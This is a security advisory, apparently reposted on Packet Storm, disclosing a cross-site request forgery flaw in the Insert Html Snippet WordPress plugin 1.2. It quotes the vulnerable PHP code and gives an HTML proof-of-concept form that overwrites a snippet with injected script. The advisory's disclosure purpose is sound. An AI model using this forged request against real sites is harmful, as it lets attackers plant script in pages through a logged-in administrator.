Exploit the possiblities

WordPress Insert Html Snippet 1.2 Cross Site Request Forgery

WordPress Insert Html Snippet 1.2 Cross Site Request Forgery
Posted Nov 29, 2016
Authored by Yorick Koster, Securify B.V.

WordPress Insert Html Snippet plugin version 1.2 suffers from a cross site request forgery vulnerability.

tags | exploit, csrf
MD5 | 70597e9717e758afa7044c6df0d23a30

WordPress Insert Html Snippet 1.2 Cross Site Request Forgery

Change Mirror Download
------------------------------------------------------------------------
Cross-Site Request Forgery in Insert Html Snippet WordPress Plugin
------------------------------------------------------------------------
Yorick Koster, July 2016

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160724-0027

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
It was discovered that the Insert Html Snippet WordPress Plugin is
vulnerable to Cross-Site Request Forgery. Amongst others, this issue can
be used to update an existing HTML snippet. This can be used to insert
arbitrary HTML and scripting code within a post or page that uses the
snippet. In order to exploit this issue, the attacker has to lure/force
a logged on WordPress Administrator into opening a malicious website.

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Insert Html Snippet WordPress
Plugin version 1.2.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue has been addressed in Insert Html Snippet version 1.2.1.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_insert_html_snippet_wordpress_plugin.html

This issue exists because Insert Html Snippet lacks protection against Cross-Site Request Forgery attacks. See for example the code that is used to edit a snippet.

if(isset($_POST) && isset($_POST['updateSubmit'])){

// echo '<pre>';
// print_r($_POST);
// die("JJJ");
$_POST = stripslashes_deep($_POST);
$_POST = xyz_trim_deep($_POST);

$xyz_ihs_snippetId = $_GET['snippetId'];

$temp_xyz_ihs_title = str_replace(' ', '', $_POST['snippetTitle']);
$temp_xyz_ihs_title = str_replace('-', '', $temp_xyz_ihs_title);

$xyz_ihs_title = str_replace(' ', '-', $_POST['snippetTitle']);
$xyz_ihs_content = $_POST['snippetContent'];

if($xyz_ihs_title != "" && $xyz_ihs_content != ""){

if(ctype_alnum($temp_xyz_ihs_title))
{
$snippet_count = $wpdb->query($wpdb->prepare( 'SELECT * FROM '.$wpdb->prefix.'xyz_ihs_short_code WHERE id!=%d AND title=%s LIMIT 0,1',$xyz_ihs_snippetId,$xyz_ihs_title)) ;

if($snippet_count == 0){
$xyz_shortCode = '[xyz-ihs snippet="'.$xyz_ihs_title.'"]';

$wpdb->update($wpdb->prefix.'xyz_ihs_short_code', array('title'=>$xyz_ihs_title,'content'=>$xyz_ihs_content,'short_code'=>$xyz_shortCode,), array('id'=>$xyz_ihs_snippetId));

In order to exploit this issue, the attacker has to lure/force a logged on WordPress Administrator into opening a malicious website.

Proof of concept

<html>
<body>
<form action="http://<target>/wp-admin/admin.php?page=insert-html-snippet-manage&action=snippet-edit&snippetId=1&pageno=1" method="POST">
<input type="hidden" name="snippetId" value="1" />
<input type="hidden" name="snippetTitle" value="Fu" />
<input type="hidden" name="snippetContent" value="<script>alert(1);</script>" />
<input type="hidden" name="updateSubmit" value="Update" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>


------------------------------------------------------------------------
Summer of Pwnage (https://sumofpwn.nl) is a Dutch community project. Its
goal is to contribute to the security of popular, widely used OSS
projects in a fun and educational way.

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

February 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    15 Files
  • 2
    Feb 2nd
    15 Files
  • 3
    Feb 3rd
    15 Files
  • 4
    Feb 4th
    13 Files
  • 5
    Feb 5th
    16 Files
  • 6
    Feb 6th
    15 Files
  • 7
    Feb 7th
    15 Files
  • 8
    Feb 8th
    15 Files
  • 9
    Feb 9th
    18 Files
  • 10
    Feb 10th
    8 Files
  • 11
    Feb 11th
    8 Files
  • 12
    Feb 12th
    17 Files
  • 13
    Feb 13th
    15 Files
  • 14
    Feb 14th
    15 Files
  • 15
    Feb 15th
    17 Files
  • 16
    Feb 16th
    18 Files
  • 17
    Feb 17th
    37 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    0 Files
  • 20
    Feb 20th
    0 Files
  • 21
    Feb 21st
    0 Files
  • 22
    Feb 22nd
    0 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close